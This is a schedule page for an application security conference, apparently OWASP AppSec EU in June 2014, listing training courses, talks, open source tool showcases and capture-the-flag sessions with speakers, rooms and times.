Write Secure Web Applications Using PHP

Design and Architect Secure PHP Applications

Configure Your PHP Applications Securely

Labs and Demonstrations

If students bring their own laptops with VirtualBox software installed, they can install an Ubuntu VM (provided by the instructor) with a vulnerable PHP application on it and participate in two interactive lab sessions. There are also two interactive demonstrations during which the PHP application is ex- ploited to show directory traversal, information leakage, and SQL injection. The labs are not compulso- ry to get the full value of the course.

Speakers

Paco Hope

Principal Consultant, Cigital

Author of two security books and frequent conference speaker, Paco Hope is a Principal Consultant with Cigital Ltd and has been working in the field of software security for over 12 years. The oldest PHP code he could find on his systems was dated 3 November 1999. Paco helps clients... Read More →

Tuesday June 24, 2014 09:00 - 13:00 BST
LAB109

Training

09:00 BST

University Challenge

Tuesday June 24, 2014 09:00 - 18:00 BST
OPT101

University Challenge

13:00 BST

Lunch - Tuesday 24th June

Tuesday June 24, 2014 13:00 - 14:00 BST
LAB005 and LAB006

Lunch, LunchTrain, LunchSummit

14:00 BST

Room LAB216: OWASP Cyber Security Startup Initiative

The initiative is a pre-startup accelerator that will leverage academia and startup communitys to build next generation cyber security startups

Please check attached PDF file for location(MAP FLOOR) .

Moderators

Martin Law

Director, First Defence Information Security

Speakers

Neill Gernon

Lead for Cyber Security Startup Initiative, at OWASP

Business Innovation & Growth Strategist. Currently leading the Cyber Security Startup Initiative with OWASP.

LAB 2nd 2 pdf

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB216

Project Summit

14:00 BST

Room LAB220: Summit Session - OWASP Development Guide

Speakers

Eoin Keary

CTO and Founder, BCC Risk Advisory Ltd.

LAB 2nd 2 pdf

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB220

Project Summit

14:00 BST

Training room 1 - Java Web Hacking & Hardening

Speakers

Christian Schneider

Freelancer, Christian Schneider

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB111

Training

14:00 BST

Training room 2 - The Mobile App Security Boot Camp

Insecure file storage

Keychain attacks

Insecure transport security

Run-time attacks

Cycript

Injection attacks

IPC handlers

Man-in-the-middle attacks

Defeating jailbreak and other defensive detection and prevention routines

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS Apps

How to hack UIWebviews, IPC handlers, client-side SQL databases, the

keychain and the App runtime

Real-world, 2014 techniques used to defeat real Apps on iOS7!

Knowledge of defensive and remedial advice

Course outline

Theory

Introduction to the Android security model

Black box assessment approach

Reverse engineering applications

Introduction to Android malware

Android Man-in-the-Middle

Stolen device reviews

Analysis/Assessment/Attack and Defence

IPC end points

JavaScript Bridges

Mobile Substrate

File permission attacks

Tap jacking

Android Sandbox

Speakers

Dominic Chell

Director, MDSec

Robert Miller

MWR InfoSecurity

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB112

Training

14:00 BST

Training room 3 - Bootstrap and improve your SDLC with OpenSAMM

Speakers

Sebastien Deleersnyder

CEO, Toreon

Bart De Win

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB113

Training

14:00 BST

Training room 4 - MDSec's Web Application Hacker's Handbook, Live Edition

Introduction to Web Application Security Assessment (Chapters 1-3)

Automating Bespoke Attacks: Practical hands-on experience with Burp

Suite (Chapter 13)

Application mapping and bypassing client-side controls (Chapters 4-5)

Failures in Core Defense Mechanisms: Authentication, Session

Management, Access Control, Input Validation (Chapters 6-8)

Injection and API flaws: (Chapters 9-10)

User-to-User Attacks (Chapters 12-13)

Attendees will gain theoretical and practical experience of:

How to quickly and efficiently pinpoint and exploit vulnerabilities in web applications

How to hack using LDAP, XPath, SOAP, HTTP Parameter Pollution (HPP), and HPI

Real-world, 2012 techniques in SQL Injection against Oracle, MySQL and MSSQL

The real risk: how to turn XSS/CSRF vulnerabilities into full account compromise

Harnessing new technologies such as HTML5, NoSQL, and Ajax

New attack types and techniques: Bit Flipping, Padding Oracle, Automated

Access Control checking

How to immediately recognise and exploit Logic Flaws

Speakers

Marcus Pinto

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB027

Training

14:00 BST

Training room 5 - The Art of Exploiting Injection Flaws

Understand the problem of Injection Flaws

Learn a variety of advanced exploitation techniques which hackers use

learn how to fix these problems

Speakers

Sumit Siddharth

Founder, NotSoSecure

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB006

Training

14:00 BST

Training room 6 - Security of XML-based Web Services and Single Sign-On

• XML and SOAP-based Web Services

XML Schema and WS-Policy

WS-Addressing und WS-Addressing Spoofing

XML Parsing (DOM vs SAX)

XML-specific Denial-of-Service Attacks

XML Security and WS-Security

◦ Why not SSL/TLS?

XML Signature

◦ ID-based and XPath-based XML Signatures

◦ XMLSignatureWrappingAttacks

XML Encryption

◦ Attacks on symmetric encryption

◦ Attacks on asymmetric encryption

WS-Attacker

SAML-based Single-Sign On

◦ Attacks

Requirements

A laptop with a recent version of “Virtual Box“ (the virtual machine will be provided). VMWare and other virtualization software should also work but cannot be supported.

Speakers

Christian Mainka

Security Consultant, Horst Görtz Institute for IT Security, Chair for Network and Data Security, Ruhr-University Bochum

Juraj Somorovsky

Security Consultant, Ruhr-University Bochum

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB028

Training

14:00 BST

Training room 7 - Defensive Programming in PHP

PHP Platform Security

The PHP Application Risk Landscape

Secure Design Principles

Defensive Programming Techniques in PHP

Secure PHP Architecture and Configuration

Objectives

After successfully completing this course, students will:

Comprehend the PHP Platform

Appreciate the Risks Affecting PHP Applications

Write Secure Web Applications Using PHP

Design and Architect Secure PHP Applications

Configure Your PHP Applications Securely

Speakers

Paco Hope

Principal Consultant, Cigital

Tuesday June 24, 2014 14:00 - 18:00 BST
LAB109

Training

14:30 BST

Room LAB215 -Understanding PCI-DSS and using OWASP PCI Toolkit

Feedback Survey

The PCI toolkit is based on a decision tree assessment methodology, which helps you identify if your web applications are part of the PCI-DSS scope and how to apply the PCI-DSS requirements. By decomposing , one by one , you will be able to create an assessment and a final report of your scope delimitation and which OWASP guidelines must be used

Please check attached PDF file for location(MAP FLOOR)

Speakers

Johanna Curiel

Security Engineer and Researcher, Mobiquity

LAB 2nd 2 pdf

Tuesday June 24, 2014 14:30 - 17:00 BST
LAB215

Project Summit

08:00 BST

Registration & Breakfast

Wednesday June 25, 2014 08:00 - 09:00 BST
LAB001 Broad Street Entrance, Loed Ashcroft International Business Schoo

Registration

09:00 BST

Open Source Showcase

The Open Source Showcase (OSS) is an event module that takes open source projects, and gives project leaders or contributors an opportunity to showcase their work in a demo type of environment. It is an event module where open source project leaders have an opportunity to demo their projects, and speak to attendees about what their project is about.

This year’s Open Source Showcase features nine open source projects over a variety of specialities. These nine projects will be demoing in their own room within the conference hall all day Wednesday, June 25. The projects below will be demoing in the morning.

OWASP NINJA-PingU is a high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. For more information on OWASP NINJA-PingU, check out the project’s wiki page here: https://www.owasp.org/index.php/OWASP_NINJA_PingU_Project

OWASP PCI Toolkit is a c# Windows form project, that will help you to scope the PCI-DSS requirements for your System Components. Beta version of this tool will be released May 2014. The OWASP PCI Toolkit page can be found here: https://www.owasp.org/index.php/Category:OWASP_PCI_Project

Hackademic Challenges Project implements realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker's perspective. Currently, there are 10 web application security scenarios available. https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project

OWASP WTE is an enhancement of the original OWASP Live CD Project and expands the offering from a static Live CD ISO image to a collection of sub-projects. Its primary goal is to make application security tools and documentation easily available and easy to use. More information on the OWASP WTE project can be found here: https://www.owasp.org/index.php/OWASP_Web_Testing_Environment_Project

OWASP ZAP, or Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. More information on OWASP ZAP can be found on the project page here: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

OWASP Bywaf, a web application penetration testing framework (WAPTF). It consists of a command-line interpreter and a set of plugins. More information on OWASP Bywaf can be found on the project’s wiki page here: https://www.owasp.org/index.php/OWASP_Bywaf_Project

WebGoatPHP is a deliberately insecure web application developed using PHP to teach web application security. It offers a set of challenges based on various vulnerabilities listed in OWASP. In each challenge the user must exploit the real vulnerability to demonstrate their understanding. The application is a realistic teaching environment and supports four different modes.This projetc is part of the PHP security framework, sponsored by Google Summer of Code 2014.

http://webgoatphp.com/

https://www.owasp.org/index.php/OWASP_PHP_Security_Project

Moderators

Martin Law

Director, First Defence Information Security

Speakers

Simon Bennetts

ZAP Project Lead, Jit

Simon Bennetts is the OWASP Zed Attack Proxy (ZAP) Founder and Project Leader, and a Distinguished Engineer at Jit.He has talked about and demonstrated ZAP at conferences all over the world, including Blackhat, JavaOne, FOSDEM and OWASP AppSec EU, USA & AsiaPac.Prior to making the... Read More →

Johanna Curiel

Security Engineer and Researcher, Mobiquity

Matt Tesauro

Senior AppSec Engineer, Duo Security

Matt Tesauro is currently a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Prior, he worked full-time for the OWASP Foundation, adding automation and awesome to OWASP projects as the Operations Director. Previously, he was... Read More →

Wednesday June 25, 2014 09:00 - 13:00 BST
LAB111 LAB112

Open Source Security Showcase

09:15 BST

Keynote - Fighting Next-Generation Adversaries with Shared Threat Intelligence

Adversaries today are technically advanced, structured around an underground governed by market forces, and using paradigm shifts in technology to compromise more victims. We examine techniques for identifying, anonymizing, and sharing threat intelligence and discuss use cases ranging from DDOS to malware where this approach can speed response times and prevent breaches.

Speakers

Jacob West

Jacob West is Chief Technology Officer for Enterprise Security Products (ESP) at HP. In his role, West influences the security roadmap for the ESP portfolio and leads HP Security Research (HPSR), which drives innovation with research publications, threat briefings, and actionable... Read More →

Wednesday June 25, 2014 09:15 - 10:00 BST
LAB026

Keynote

10:00 BST

OWASP Board Presentation

Wednesday June 25, 2014 10:00 - 10:30 BST
LAB026

Board

10:00 BST

Capture the Flag (Day 1 AM)

Volunteers

steven van der baan

Wednesday June 25, 2014 10:00 - 13:30 BST
LAB027

Capture the Flag

10:30 BST

Morning Coffee

Wednesday June 25, 2014 10:30 - 11:00 BST
LAB005 and LAB006

Break, ConfBreak, Morning

11:00 BST

Cloud-based Detection Techniques for Botnets and Other Malware

Traditional techniques for detecting malware, such as viruses, worms and rootkits, rely on identifying virus-specific signature definitions within network traffic, applications or memory. Because a sample of malware is required to define an attack signature, signature detection has drawbacks when accounting for morphism, has limited use in Zero-Day protection and is a post-infection technique requiring malware to be present on a network, or device, in order to be detected.

Botnets are ideally suited for launching mass Distributed Denial of Services (DDoS) attacks against the ever increasing number of networked devices that are starting to form the Internet of Things, and ultimately Smart Cities. Regardless of topology; centralised with Command & Control servers (C&C), or distributed peer-to-peer (P2P), Bots must communicate with the other Bots in the Botnet, as well as their overall commanding Botmaster. This communication traffic can be used to detect malware activity in the cloud well before it has been able to evade network perimeter defences, and to determine a route back to source to take down the threat.

This presentation highlights the main drawbacks of traditional signature based detection methods. It discusses the alternative techniques of cloud based traffic analysis for pre-infection detection of malware, in particular Botnets, which can be performed on Big Data being generated by Service Providers, and demonstrates how cloud centric traffic based detection techniques can be used to complement traditional signature based anti-malware and overcome some of its drawbacks.

Finally, this presentation identifies a lack of techniques for detecting malicious Bot activity within virtual environments, which now form the backbone of data centre infrastructure, and provide a new, as of yet untapped, attack vector for future malware. This identification of a lack of techniques works as a pre-cursor to my PhD research which is to detect malware behaviour within virtual environments.

Speakers

Mark Graham

PhD Student, Anglia Ruskin

Mark has spent 15 years in the IT Industry, wearing various hats, working for Kingston Communication, C&W (formerly Energis), Nortel Networks and Signify. 3 years ago, Mark completed an MSc in Network Security, at Anglia Ruskin University. Mark is currently studying a PhD at Anglia... Read More →

Wednesday June 25, 2014 11:00 - 11:50 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 100

11:00 BST

eXtend Security on Xcode

The mobile industry is now booming. According to Apple, the number of iOS apps in App Store reached 1,000,000 as of October 2013. In this highly competitive market, mobile app developers are required to develop a high-value, high-quality and high-performance app with a short time-to-market. Implementing security into earlier phases of such rapid pace agile development life cycle can be considered as one of the key success factors for organizations.

We believe that adding an automated security measure into the Xcode IDE itself is essential and can help facilitate secure agile development cycles for iOS developers. Therefore, we are implementing our own security features on top of Xcode.

During the coding phase, developers will be able to automatically spot general security issues in iOS apps and thus prevent them from creating those issues. This can also help security testers to conduct white-box security testing in a shorter amount of time. We will also share the difficulties and problems we faced and how we overcame them during our research.

Speakers

Tokuji Akamine

Lead Security Engineer, Rakuten, Inc.

Tokuji Akamine is a Lead Security Engineer at Rakuten, where he conducts security testing, security training and security research. Before joining Rakuten, he was a senior security consultant at Symantec and provided application security consulting to a variety of enterprise customers... Read More →

Raymund Pedraita

Senior Security Engineer, Rakuten, Inc.

Raymund does security audit for web, network and mobile apps. Started his involvement with security when he joined Fourteenforty Research Institute in 2008, doing research and developing security solutions and tools. For almost 9 years he was developing applications for Windows and... Read More →

Wednesday June 25, 2014 11:00 - 11:50 BST
LAB002

Mobile Track, Mobile

Company 48

11:00 BST

Biting into the Forbidden Fruit. Lessons from Trusting JavaScript Crypto.

We all know JS crypto is flawed, right? Over the years, security community has pointed out its multiple fundamental problems. Several arguments were made and "JavaScript cryptography is bound to fail" became a mantra. Of course, despite all this JS crypto WAS used all over the place. Theory met practice - it was about time to dig into this!

In recent months, we tested various high-profile, in the wild crypto libraries, applications and systems. We saw code from home-grown cryptography to full-blown TLS or OpenPGP implementations. Hilarious bugs were spotted, protections were bypassed and systems were pwned. But was it really that different from what we all had already seen in OpenSSL, BouncyCastle or GnuPGP? Can we actually fix all those bugs? Does it mean that Javascript cryptography can be, pardon us saying, secure like any other?

Come and listen. During the talk vulns will be shown, authorities - questioned, myths - debunked, and browsers cursed upon. You'll see the full picture - from XSS, to man-in-the-middle, to PRNGs and timing side-channels, even snippets in C. No stone will be left unturned, nothing will be taken for granted. You'll be left with an updated, solid and heavily opinionated view of JavaScript cryptography.

Speakers

Krzysztof Kotowicz

Senior Software Engineer, Information Security Engineering team, Google

Krzysztof Kotowicz is a web security researcher specializing in discovery and exploitation of client-side vulnerabilities, and a software engineer in the Information Security Engineering team at Google. Speaker at various security conferences (ACM CCS 2017, Black Hat USA 2017, OWASP... Read More →

Wednesday June 25, 2014 11:00 - 11:50 BST
LAB026

Security Management & Training Track, SecManTrain

Company 34

11:50 BST

Monitoring Web Sites for Malware Injection with WebDetector

It’s estimated that 86% of all websites had at least a serious vulnerability during 2012. Attackers either manually or automatically (via botnets) deploy C&C servers and malware droppers within exploited websites to infect clients. When such an intrusion is not detected by the owner, the website can deliver malware for long periods until somebody either privately or publicly notices it and maybe an investigation starts.

To tackle this, we have developed a web monitoring tool called WebDetector, that can be scheduled to run periodically over a list of domain names and to produce a score that indicates how malicious a page is.

The tool is currently written in python and relies on several open source components for mirroring, file tracking and indexing plus a set of heuristics to detect harmful components like javascripts, PDF, shockwaves, form spoofing and link redirection. The framework can be expanded with modular signatures to detect in future more types of attacks with the help of the community.

We have tested the efficacy of WebDetector by deliberately adding common malicious behaviour in a controlled Wordpress installation. More sophisticated malware strategies needs refined heuristics for detection that will be addressed in future.

Speakers

Tim Burrell

Paolo Di Prodi

Machine Learning Engineer, Microsoft

I love control systems and robotics.

Wednesday June 25, 2014 11:50 - 12:35 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 95

11:50 BST

Intent on Being a Good Android Citizen?

Has Android achieved the impossible? Do intents enable interprocess communications and inter-process collaboration that is actually securable? The answer, as in many platforms, is a definite ‘maybe’. Firstly, intents invite "new" attacks - attacks more traditionally associated with distributed systems - such as spoofing, hijacking, out of order execution and theft of data. Secondly, all is not always as it seems. Like so many things in in life, it is possible to do things right and still get it wrong. Securing intents properly requires a defensive approach of some old techniques plus an added step of validating some assumptions. This talk is aimed mainly at app developers - learn how intents work under the hood, how to secure your intents and how to secure your assumptions to achieve your goal of secure apps.

Speakers

Andrew Lee-Thorp

Senior Consultant, Cigital

Andrew Lee-Thorp is a security consultant with over 10 years of experience cutting his teeth in development from smart cards through to high-end servers systems. He currently works as a Consultant with Synopsys where he performs code reviews, architectural risk analysis, and Android... Read More →

Wednesday June 25, 2014 11:50 - 12:35 BST
LAB002

Mobile Track, Mobile

Company 65

11:50 BST

OWASP Security Shepherd - Mobile/Web Security Awareness and Education

What is this all about?

The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving security awareness among a varied skillset demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.

Security Shepherd covers the OWASP Top Ten web app risks and has recently been injected with totally new content to cover the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.

Over the last year the OWASP Security Shepherd has proven itself to be a resilient platform in which CTF (Capture the Flag) events can be deployed upon. Examples include

The OWASP Global CTF 2013

IRISScon 2013 Cyber Security Challenge

The OWASP EU Tour 2013 Online CTF

Source Conference CTF

The OWASP LATAM 2013 Tour Online CTF

The OWASP Ireland AppSec 2012 CTF

One of the biggest concerns that organisers of CTF competitions have is that their system or scoreboard may be compromised. There are few open source projects that offer a secure CTF platform to utilise. With the Shepherd platform been subject to the playful prods and less playful assaults from five continents, it is a candidate to fill this gap. The OWASP Security Shepherd is in the process of been forked to provide the OWASP Shepherd CTF Platform.

Speakers

Mark Denihan

Ethical Hacking Test Engineer, IBM

I'm currently working on the IBM Ethical Hacking Team, OWASP Ireland Board Member and founded of the OWASP Security Shepherd Project. I got my BSc in Computing in the Dublin Institute of Technology and I'm working on a MSc in Information Security and Digital Forensics in the Institute... Read More →

Seán Duggan

Security Analyst, Ward Solutions

Sean is a Security Analyst with Ward Solutions. Currently holding an Honors BSc Computer Science and studying for a Masters in Information Security and Digital Forensics. passionate about Android App Security and Development. Sean developed an interest in Mobile Application Security... Read More →

Wednesday June 25, 2014 11:50 - 12:35 BST
LAB026

Security Management & Training Track, SecManTrain

Company 54

12:35 BST

Lunch - Wednesday 25th June

Wednesday June 25, 2014 12:35 - 13:50 BST
LAB005 and LAB006

Lunch, LunchConference

13:30 BST

Capture the Flag (Day 1 PM)

Volunteers

steven van der baan

Wednesday June 25, 2014 13:30 - 20:30 BST
LAB027

Capture the Flag

13:50 BST

Defending TCP Against DoS Attacks

On the global Internet, the main function of TCP is to provide a reliable byte stream process to process communication. Today, TCP is the most widespread protocol used for exchanging data in the Internet and almost responsible for more than 90 percent of the world's total data traffic on the Internet. Despite its widespread usage, many of the TCP protocols were designed with little consideration given to the security implications. For example, the TCP protocol stack could be vulnerable to a variety of attacks ranging from IP spoofing to denial of service.

This paper classifies a range of known TCP attack methods focusing in particular on password sniffing, SYN flooding, IP spoofing, TCP sequence number attack, TCP session hijacking, RST/FIN attacks and the low rate TCP targeted denial of service attack. . The paper will also examine the vulnerability points of these TCP protocols in attempting to provide solutions to such attacks. Finally, a real time network simulation infrastructure will be provided along with detail experiments analysis to validate the efficiency of our security approaches.

Speakers

Hesham El Zouka

Arab Academy for Science & Technology and Maritime Transport

Wednesday June 25, 2014 13:50 - 14:40 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 88

13:50 BST

OWASP Mobile Top Ten 2014 – The New “Lack of Binary Protection” Category

Recently, there has been a new addition to the OWASP Mobile Top Ten; a lack of binary protections. At AppSec California, OWASP debuted it and briefly highlighted examples of the threats to mobile devices in this category. In this talk I will discuss the new category in much more depth, exploring reasons why this risk category has now been included in OWASP’s Top Ten Mobile Security Risks.

In 2013, consumers downloaded more than 83 billion applications from app stores worldwide, with revenues totalling $25 billion. According to Portio research, this is expected to grow to over 200 billion downloads per year by 2017. It is clear that the App Economy is not only thriving, but is driving new app-centric products and services across multiple industries and with the continued adoption of mobile computing, the threats to mobile and applications is continuing to grow.

Based on research conducted by Arxan, we found that over half of the top 100 iOS apps had been hacked or tampered with and made available for download on third party app stores. This included 53 percent of Android, and 23 percent of mobile banking and payment applications.

The talk will specifically highlight the risks that a lack of binary protections poses to mobile applications on both iOS and Android platforms. The speaker will discuss how to leverage specific OWASP projects to solve these issues and secure apps from tampering. By the end of the talk, attendees will have a solid understanding of the risks associated with lack of binary protections and how to begin thinking about incorporating app risk mitigation solutions to protect their applications. Risk mitigation approaches discussed will include how to incorporate processes that harden an app against binary-level integrity and reverse-engineering attacks launched at rest and run-time.

Speakers

Jonathan Carter

Application Security Strategist, Lending Club

Jonathan Carter is an application security professional with over 15 years of security expertise within Canada, United States, Australia, and England. As a Software Engineer, Jonathan produced software for online gaming systems, payment gateways, SMS messaging gateways, and other... Read More →

Wednesday June 25, 2014 13:50 - 14:40 BST
LAB002

Mobile Track, Mobile

Company 61

13:50 BST

OWASP Hackademic: Towards an Educational Ecosystem for Application Security

Teachers of Application Security in higher education institutions and universities are presented with some unique challenges, especially when compared to other scientific or even computer science fields. This is mainly because students have to learn how to design, implement and protect applications against both known and unknown attacks. Moreover, the so far established stereotypes present the potential intruders as being ingenious and able to penetrate almost every system.

The OWASP Hackademic Challenges Project introduces the "attacker's perspective" in higher education by implementing realistic scenarios with known vulnerabilities in a safe, controllable environment. Students can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker's perspective.

Its main difference from other projects that implement vulnerable applications for educational purposes, is that it is has been created mainly for use in a classroom environment, while most other solutions take a more self-learning approach. The OWASP Hackademic Challenges are not just another set of vulnerable applications but a complete teaching environment. In this manner, students can be organized in classes with different set of challenges per class. A sophisticated grading system allows the assessment of students according to their effort and performance and not just the ability to solve the challenge, while several forms of cheating can also be detected.

The OWASP Hackademic Challenges are currently being used by more than a dozen universities around the world and are also part of the "Hacking Lab" and "OWASP University Challenge". In addition, we have received contributions to the project by several researchers, including the New Jersey Institute of Technology.

The OWASP Hackademic Challenges simulate real-world scenarios that application security consultants and penetration testers encounter during their day-to-day engagements, combined with the academic requirements of a related module. These exercises can be used to complement the respective theoretical lectures. Statistical analysis of the feedback we received from students through questionnaires, shows that the students embraced this approach and have benefited significantly from going through these exercises. In practice, the OWASP Hackademic Challenges help students become more enthusiastic about application security by gaining a realistic, hands-on experience on some real-world vulnerabilities.

In this presentation we will give an overview of the Hackademic Challenges and analyze its scientific background. In addition, we will present new features introduced to the interface that was developed during the Google Summer of Code 2013 which include a plugin API. Moreover, as the project is still under development, we expect a bunch of new features to be ready by the conference dates.

We will introduce the new concept of training modules, a significant addition whose aim is to integrate entire teaching modules. A training module refers to a bundle of reading material and challenges with specific scoring rules. This allows the users/professors to manage complete logical entities and allows for better modularity of the courses. Also, in our experience there is a significant number of students who once they finish a security course, they wish to write challenges and improve the course in general. This concept will allow them, and anyone wishing to contribute course material, to provide entire logical modules in a bundle. Also, this method allows for easier integration of other useful features which are being developed, such as gamification.

Our goal is to create an educational ecosystem around Hackademic that includes teachers, students and professionals who contribute and consume teaching material and realistic challenges in an open way.

Finally, we will introduce an open id integration module. This showcases a good security practice and allows the users to login with many popular open-id providers, simplifying the registration process.

A demo of the new Hackademic portal and challenges will also be delivered, emphasizing on how it can be used in a real classroom and giving the chance to attendees to get their hands on it.

Speakers

Spyros Gasteratos

Spyros Gasteratos is a software engineer at Telesto Technologies Ltd. He has undertaken numerous projects in several fields of IT, such as Linux administration, web server hardening and web development. He is the project leader and the main developer of the OWASP Hackademic Challenges... Read More →

Konstantinos Papapanagiotou, Spryros Gastreratos

Information Security Services Team Lead, OTE

Both trainers are Hackademic project leaders, long time OWASP members and application security professionals

Wednesday June 25, 2014 13:50 - 14:40 BST
LAB026

Security Management & Training Track, SecManTrain

Company 53

14:00 BST

Open Source Showcase

OWASP NINJA-PingU is a high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. For more information on OWASP NINJA-PingU, check out the project’s wiki page here:https://www.owasp.org/index.php/OWASP_NINJA_PingU_Project

OWASP ZAP, or Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. More information on OWASP ZAP can be found on the project page here:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

ThreadFix is a software vulnerability aggregation and management system that helps organizations aggregate vulnerability data, generate virtual patches, and interact with software defect tracking systems. More information on the ThreadFix project can be found here: https://github.com/denimgroup/threadfix/

OWASP OWTF, the Offensive (Web) Testing Framework, is an OWASP+PTES-focused try to unite great tools and make pen testing more efficient. For more information about the OWASP OWTF Project, check out the project’s wiki page here: https://www.owasp.org/index.php/OWASP_OWTF

OWASP Python Security Project aims at creating a hardened version of python that makes it easier for security professionals and developers to write applications more resilient to attacks and manipulations. More information about the OWASP Python Security Project can be found here:https://www.owasp.org/index.php/OWASP_Python_Security_Project

WebGoatPHP is a deliberately insecure web application developed using PHP to teach web application security. It offers a set of challenges based on various vulnerabilities listed in OWASP. In each challenge the user must exploit the real vulnerability to demonstrate their understanding. The application is a realistic teaching environment and supports four different modes.This projetc is part of the PHP security framework, sponsored by Google Summer of Code 2014.Websites:

Moderators

Martin Law

Director, First Defence Information Security

Speakers

Simon Bennetts

ZAP Project Lead, Jit

Johanna Curiel

Security Engineer and Researcher, Mobiquity

Matt Tesauro

Senior AppSec Engineer, Duo Security

Wednesday June 25, 2014 14:00 - 18:00 BST
LAB111 LAB112

Open Source Security Showcase

14:40 BST

OWASP ZAP: Advanced Features

The Zed Attack Proxy (ZAP) is an OWASP Flagship project and the largest open source web application security tool measured by active contributors. While it is an ideal tool for people new to appsec it also has many features specifically intended for advanced penetration testing.

In this talk Simon will give a quick introduction to ZAP and then dive into some of these features, including:
* Handling single page and other ‘non standard’ apps
* Client side testing with Plug-n-Hack
* Advanced scanning options
* Contexts
* Fuzzing
* Scripting
* Zest - ZAP’s macro language
* Changing the source code

Speakers

Simon Bennetts

ZAP Project Lead, Jit

Wednesday June 25, 2014 14:40 - 15:30 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 91

14:40 BST

Smart Storage Scanning for Mobile Apps - Attacks and Exploit

Mobile application hacking and its security is becoming a major concern in today’s world specially with BYOD and user’s jailbreaking/rooting their devices. Scanning and vulnerabilities detections are two major areas for mobile applications in current state. Attacking techniques and exploit delivery on different platform are evolving, protection is even tougher as code base are different. The frequency of release for the mobile application is significantly higher than the web application. It is imperative to scan these applications before loading and launching for different platforms.

Amongst the mobile attacks described in OWASP Mobile Top 10 project, Local storage being the key attack which affects the security and privacy of the user. Need for an hour is to have automated program to penetrate local storage in most widely used mobile platform (android and iOS). Interestingly, Android SDK provides an API which can be used to monitor file system. On the iOS, one needs to use jailbreak device to attack local storage. Along with presentation, new version of the free tools (Separate for android and iOS) will be released. Android tool uses API to monitor android file system where iOS tool relies on OS features. Methodology to perform application penetration testing using the tools will be demonstrated along with several different demonstrations on attacking local storage for both platforms along with defense strategies.

Speakers

Hemil Shah

Hemil Shah, CISSP, CSSLP, ACP is the founder and Director of eSphere Security, a company that provides Professional services in Security Arena. He has worked with HBO, KPMG, IL&FS and Net-Square in security space. He has published several advisories, tools, and Whitepapers, and has... Read More →

Wednesday June 25, 2014 14:40 - 15:30 BST
LAB002

Mobile Track, Mobile

Company 43

14:40 BST

Relax everybody, HTML5 is much securer than you think

Many, many conferences nowadays come with "HTML5 is insecure" or "Hacking with HTML5" talks. This has lead to a general perception that HTML5 itself (whatever the term actually stands for) is insecure and, thus, should be avoided for security reasons. This is highly unfortunate, as the current generation of new Web APIs expose a level of security sophistication, which is unparalleled in the Web's history. In fact, new browser features such as CORS or PostMessage allow, for the first time, to securely realize usecases which, up to now, required the programmers to resort to insecure programming practices.

In this talk, we will systematically explore security relevant HTML5 APIs. To do so, we discuss their respective security architecture and, more importantly, show how they compare to currently established techniques which were designed to realize similar use cases.

Plainly speaking you can consider this talk as a "information security deathmatch - HTML5 vs. its alternative" (spoiler: HTML5 wins).

More specifically, the talk will cover:

# Client-side cross-domain communication:

- CORS (HTML5) vs. JSONP and/or crossdomain.xml

# Client-side persistence

- LocalStorage (HTML5) vs. Cookie-hacks

# In-browser communication

- PostMessage (HTML5) vs.
-- hash-identifier passing and/or
-- window.name setting and/or
-- domain relaxation

# ClickJacking protection

- X-Frames-Options (HTML5) vs. JavaScript framebusters

# Bonus track: The browser's new security capabilities

A quick overview of new browser features that can be used to secure Web sites:

- Content Security Policies
- Sandboxed iFrames
- Strict-transport Security

The session's content is based on the experiences and lessons learned of a international academic research project on modern Web security (WebSand, http://websand.eu) of which the speaker is the technical lead. All given details will be backed with empirical data (when applicable). Furthermore, all discussed technologies can be accompanied with proof-of-concept code or practical demonstrations (if time permits).

Speakers

Martin Johns

Research Expert, SAP SE

Dr. Martin Johns is a Research Expert in the Product Security Research unit within SAP SE, where he leads the Web application security team. Furthermore, he serves on the board of the German OWASP chapter. Before joining SAP, Martin studied Mathematics and Computer Science at the... Read More →

Sebastian Lekies

Sebastian Lekies is a PhD candidate at SAP and the University of Bochum. His main field of research is Web application security. Thereby, he mainly focuses on client-side Web attacks such as Cross-Site Scripting, ClickJacking, DNS-Rebinding, Cross-Site Request Forgery, etc. He... Read More →

Wednesday June 25, 2014 14:40 - 15:30 BST
LAB026

Security Management & Training Track, SecManTrain

15:30 BST

Afternoon Coffee

